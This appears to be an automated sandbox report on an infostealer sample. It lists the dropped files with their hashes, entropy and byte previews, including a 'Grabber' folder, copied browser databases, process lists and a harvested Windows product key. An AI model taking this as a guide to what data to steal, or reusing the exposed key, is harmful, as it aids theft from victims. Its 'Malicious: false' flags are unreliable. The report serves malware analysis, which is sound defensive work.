SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\System\Process.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	18555
Entropy (8bit):	5.650268096337422
Encrypted:	false
SSDEEP:	96:ya8wq2n89bBhwFIultVTWGFxmjbtJ9eZwyi23b2:ya8BL7aFIwtVTWGFx89e2+2
MD5:	A8041A768A0BA40C1429F7B3ED97100E
SHA1:	F9F4041FDB4A957D983CC2B20461C8297136133F
SHA-256:	3E43177708963BD7782FACF122824524D60DC2738B18DC6886D9B55E835FF431
SHA-512:	BB00724F728345B19CA94AD6E591CD9F43C3C254FF1735CA29A9EC9D20466329D582AC5F6FB7AAB70067F0A4C8C95747B5DEF66CD95F32F2714D7CF4CFA0D7AA
Malicious:	false
Preview:	NAME: svchost..PID: 860..EXE: C:\Windows\system32\svchost.exe..NAME: pIAkOaCiMGhQ..PID: 5600..EXE: C:\Program Files (x86)\UKdgYSCLAJgIsdtfspMURwazsfzQprkDKRstNDCNvxedHGGsrZEGTnOQtfeafC\pIAkOaCiMGhQ.exe..NAME: pIAkOaCiMGhQ..PID: 6892..EXE: C:\Program Files (x86)\UKdgYSCLAJgIsdtfspMURwazsfzQprkDKRstNDCNvxedHGGsrZEGTnOQtfeafC\pIAkOaCiMGhQ.exe..NAME: svchost..PID: 3012..EXE: C:\Windows\System32\svchost.exe..NAME: pIAkOaCiMGhQ..PID: 6456..EXE: C:\Program Files (x86)\UKdgYSCLAJgIsdtfspMURwazsfzQprkDKRstNDCNvxedHGGsrZEGTnOQtfeafC\pIAkOaCiMGhQ.exe..NAME: pIAkOaCiMGhQ..PID: 1280..EXE: C:\Program Files (x86)\UKdgYSCLAJgIsdtfspMURwazsfzQprkDKRstNDCNvxedHGGsrZEGTnOQtfeafC\pIAkOaCiMGhQ.exe..NAME: svchost..PID: 2572..EXE: C:\Windows\System32\svchost.exe..NAME: csrss..PID: 412..EXE: ..NAME: svchost..PID: 4288..EXE: C:\Windows\System32\svchost.exe..NAME: RuntimeBroker..PID: 5084..EXE: C:\Windows\System32\RuntimeBroker.exe..NAME: svchost..PID: 5148..EXE: C:\Windows\system32\svchost.exe..NAME: pIAkOaCiM

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\System\ProductKey.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.8143719431796272
Encrypted:	false
SSDEEP:	3:exeniy/E:uvh
MD5:	4AF59D5D770FCB01009CBB54FAC0A895
SHA1:	BE623A13218915892C48C5E3AF972EDD94B80CDC
SHA-256:	053230952D5B5C84C1A078D46789FA44AAA0AA17151FAF97D69C8749B9CD1F5A
SHA-512:	AF89ADEDDDB772BBACB57F20C91FD291A24DFE8A29699A1320530781995DA7178310A0AEBA7A57161B5854C0467D473D0C8C9AFB715DE884A5EB7C3EE2AC85EF
Malicious:	false
Preview:	MW64N-33FTD-BGMDF-FJVWY-TW7BM

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\System\ScanningNetworks.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	84
Entropy (8bit):	4.6630509827051725
Encrypted:	false
SSDEEP:	3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
MD5:	58CD2334CFC77DB470202487D5034610
SHA1:	61FA242465F53C9E64B3752FE76B2ADCCEB1F237
SHA-256:	59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
SHA-512:	C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
Malicious:	false
Preview:	Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\System\Windows.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	15055
Entropy (8bit):	5.602039990377023
Encrypted:	false
SSDEEP:	48:z1JxZUEgDZ5znNMEmPDFMi1RDnGKtAxLwDYeTm1wLUuKZMsHrxbDTO12w3ipQnt7:qQbqfJBlAnlp
MD5:	CDBBC26250AF62E8A3E95910C79EFB20
SHA1:	997DE81EACD0FC98751C51D7A17DA5AF97450566
SHA-256:	604632A23A88F0B1A7864A68DF14B3AA5A10072828CDEDD04EAEA1ED6C8D7BAB
SHA-512:	9B653FC48792A69F44892CB358C252AE6E9D1CD7674787ED047648879957B1B6F8AF639C77380E66C1C1A010AA89687CB94FCE19C629F7E593A2441158AC8C43
Malicious:	false
Preview:	NAME: pIAkOaCiMGhQ..TITLE: New Tab - Google Chrome..PID: 5600..EXE: C:\Program Files (x86)\UKdgYSCLAJgIsdtfspMURwazsfzQprkDKRstNDCNvxedHGGsrZEGTnOQtfeafC\pIAkOaCiMGhQ.exe..NAME: pIAkOaCiMGhQ..TITLE: New Tab - Google Chrome..PID: 6892..EXE: C:\Program Files (x86)\UKdgYSCLAJgIsdtfspMURwazsfzQprkDKRstNDCNvxedHGGsrZEGTnOQtfeafC\pIAkOaCiMGhQ.exe..NAME: pIAkOaCiMGhQ..TITLE: New Tab - Google Chrome..PID: 6456..EXE: C:\Program Files (x86)\UKdgYSCLAJgIsdtfspMURwazsfzQprkDKRstNDCNvxedHGGsrZEGTnOQtfeafC\pIAkOaCiMGhQ.exe..NAME: pIAkOaCiMGhQ..TITLE: New Tab - Google Chrome..PID: 1280..EXE: C:\Program Files (x86)\UKdgYSCLAJgIsdtfspMURwazsfzQprkDKRstNDCNvxedHGGsrZEGTnOQtfeafC\pIAkOaCiMGhQ.exe..NAME: pIAkOaCiMGhQ..TITLE: New Tab - Google Chrome..PID: 5944..EXE: C:\Program Files (x86)\UKdgYSCLAJgIsdtfspMURwazsfzQprkDKRstNDCNvxedHGGsrZEGTnOQtfeafC\pIAkOaCiMGhQ.exe..NAME: pIAkOaCiMGhQ..TITLE: New Tab - Google Chrome..PID: 6004..EXE: C:\Program Files (x86)\UKdgYSCLAJgIsdtfspMURwazsfzQprkDKRstNDCNvxedHGGsr

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\System\WorldWind.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	98246
Entropy (8bit):	7.8825895832733694
Encrypted:	false
SSDEEP:	1536:CtUyvSu+Eong24P1Iq0XnQ9GCWFCIaAlA7WVKajaiB5SkhEW2KASM3uDxKBfljq7:2UiSu+Eog24dpqFCWjrmFka0SIEb3uDT
MD5:	EDD89866671FB16D0301ABE41196635E
SHA1:	F7A74CB6CEA2CEA944BDBF1839754AE70F80837A
SHA-256:	F34ABA3057E2D6A0456B714799A231687B9F2346A0186D23CE1AB40A3909FFA1
SHA-512:	20E260EAB7E9E7F47883725EAF2C70BAE345B3C818BC315069DFBF0773EA35768EC315CF4994595E734C4241E7583D259D26BA14F5F4A09EF18A647C057C373F
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(.........k.._:U.d..2.v..G..\^)a.........Q.......?.A.9..@...'...G. .....w.G.....;.n..3...W...:<r.]...yl......6A

C:\Users\user\AppData\Local\Temp\aut99DF.tmp

Download File

Process:	C:\Users\user\Desktop\6mllsKaB2q.exe
File Type:	data
Category:	dropped
Size (bytes):	139488
Entropy (8bit):	7.883072207525681
Encrypted:	false
SSDEEP:	3072:W9xdS9kZLhcpNoYTc+RuNDB8MPcSgAFdw7n6Zy:W9Wq8plTc+QDBRkSggdw0y
MD5:	B02C4BBEF41D57DCF18E74EC3118F908
SHA1:	96AD90FAD8508C889FA99B44B60925C9FA91F57C
SHA-256:	13C19DC9064FD845F3BAE9E6628607567F5DCCB136A87472F696B5A70FD230F2
SHA-512:	A064462B3D459CC9B50A61227926B26FABC6818FEF1B34299A4D434AAD46BBF3362E85C3A028D28DDBB4985EC4BC849024DB579008C16A5D12575C3509400CD2
Malicious:	false
Preview:	EA06......u.uZaX..3...c5.RiSI.B.V.V* .E..1.....0...6..E~M..Lp3.%..2.`..I..q...j=fIj...9...3..is.4F.V..v...sT...u...#68.6.\|...\.^...mZeY.M.3.'.g5.P@.1..........u.m..@.Tg4..,..(....&3p..S....FmA..+...ji3...b......eX..l:............K..Sj.....:.....i.G.6>......T.T..#.RiUH.}$...3..#..HL.........."..T.>.Q)...L.j...2..E....@.O....$...H..).oDn.6..(....uI..&ujh....2..&.[.6.:.^..x...+..i4.$f.K.L+....sN.F...i9.Y..u.m[.....J.@...b....nT...qI.M..mZmr..r..BB.HM.5.=.5X..u..."c3..?..~.KV.Tf.I...1..,`......P..I.L.@.~$.....R..(....X..S+`E.p...T..>.\|.Eo.R&..U.K..)r[..a{.. sz.^.4...5i.z...U..Y.\.....`!.....B... #.I...#.......P.^.L....&.....@G....ze8..#.......W.....w%...`$..i>..H....+R.N.....C"..6....0...:.....RlS.B.z.W.sI...7..i4...]L.H!sJ.R.:.Mg...._...z..!n.H....$.!.V.r.t.k>......9Z..(.;u".7..,S...s7...T.$.qI.G..).baX..).....&.{.....L@$1...%.).........P.Ag..g...F.....#R..q.-.......!`...p.&..I....;u.$@..T.4..,5..b.=..i...a`.W......RX...8.U....C/.X..z^..P.A.

C:\Users\user\AppData\Local\Temp\corynteria

Download File

Process:	C:\Users\user\Desktop\6mllsKaB2q.exe
File Type:	data
Category:	modified
Size (bytes):	179200
Entropy (8bit):	6.98389607103907
Encrypted:	false
SSDEEP:	3072:MOCblBM0umkYjC3eU+W2GxixG4Phc+rQO6OJ5n5whdPfYG62vCa4DQb8X:MOCbla03ueUGIivF1L5wHukb8X
MD5:	E7F040AECE4EAFBD290B73E61EA01AD2
SHA1:	0CC2A8D51E204E5671EBC610FA4C36CA627EAFDA
SHA-256:	8449A5E04C8082ED45E6EDED4374A13128FA65029950C6C1971A75F8042537B1
SHA-512:	17871D0EAC68F6C273E976155C271074A31703019DE5970E670FB751D6ADC3CB77A256993F60A3A417D088A5676143417DA68C91079F155F2899FA01B8363191
Malicious:	false
Preview:	.n.PNV0XU6Q9..15.IJ43PMVpXQ6Q9DH158IJ43PMV0XQ6Q9DH158IJ43PMV.XQ6_&.F1.1.k.2..wd08EqI6'VGY$jWR>#9Dx3SqK1&.\Vi.{`p 9T=.;\3`H158IJ4c.MV\|YR6..%/158IJ43P.V2YZ7Y9D.358AJ43PMV..S6Q.DH158IJ4sPMv0XQ4Q9@H158IJ47PMV0XQ6Q.GH178IJ43POVP.Q6A9DX158IZ43@MV0XQ6A9DH158IJ43P!.2X.6Q9D.358OJ43PMV0XQ6Q9DH158IJ40PAV0XQ6Q9DH158IJ43PMV0XQ6Q9DH158IJ43PMV0XQ6Q9DH158IJ43pMV8XQ6Q9DH158IB.3P.V0XQ6Q9DH15.=/LGPMV..S6Q.DH1.:IJ63PMV0XQ6Q9DH15.IJT.">$SXQ6Q?DH1.:IJ23PM.2XQ6Q9DH158IJ4sPM..4Z>ZDH=58IJ40PMT0XQ.S9DH158IJ43PMVpXQtQ9DH158IJ43PMV0X..S9DH15pIJ41PHV..P6.EH25:I.43VMV0XQ6Q9DH158IJ43PMV0XQ6Q9DH158IJ43PMV0XQ6Q9DH152]`45zMV:L{6W.DH+G9IJD.PK\|0X[ {9N^.52_`49FgV:N{6[/nH;#.I@".PK\|0XW.Q9rJC48I:7\AMV6rQ6[-nH;!.I@7.PGB.Xs).J.H13.IJ4.O.%VXQ0t;9j15<c@".PGR.XB.T9SH159IJ%@SMV:RS0G/R',58OL[7PM\.XB.T9SH159IJ%@SMV:RS0G:S',58OL[7PM\.XO4"oDH7..K%3PK%bXQ0{9DH.7WWJ45#.V0^{6Q9Wx55.IJ41PMG.XQ6Q9DH1?:&L43Vm.0XQ.T9DB#5.OJ49\|OP.{Q6Q9DH15.I.6<QeS0X[.V9DB^28IL..R"t0XW_{9DH.7;%%.3PK\|0Xs4>.DH7^.IJ4.RN:_{Q6W.DH".:Ih43PNV0IG<SVBH13*Ib<3PGz2^{4

C:\Users\user\AppData\Local\Temp\places.raw

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03786218306281921
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
MD5:	4BB4A37B8E93E9B0F5D3DF275799D45E
SHA1:	E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
SHA-256:	89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
SHA-512:	F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB49A.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB4BB.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB4CB.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB4EC.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB4FC.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB53C.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB54C.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB55D.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB55E.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB61A.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB64A.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03786218306281921
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
MD5:	4BB4A37B8E93E9B0F5D3DF275799D45E
SHA1:	E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
SHA-256:	89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
SHA-512:	F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
Malicious:	false
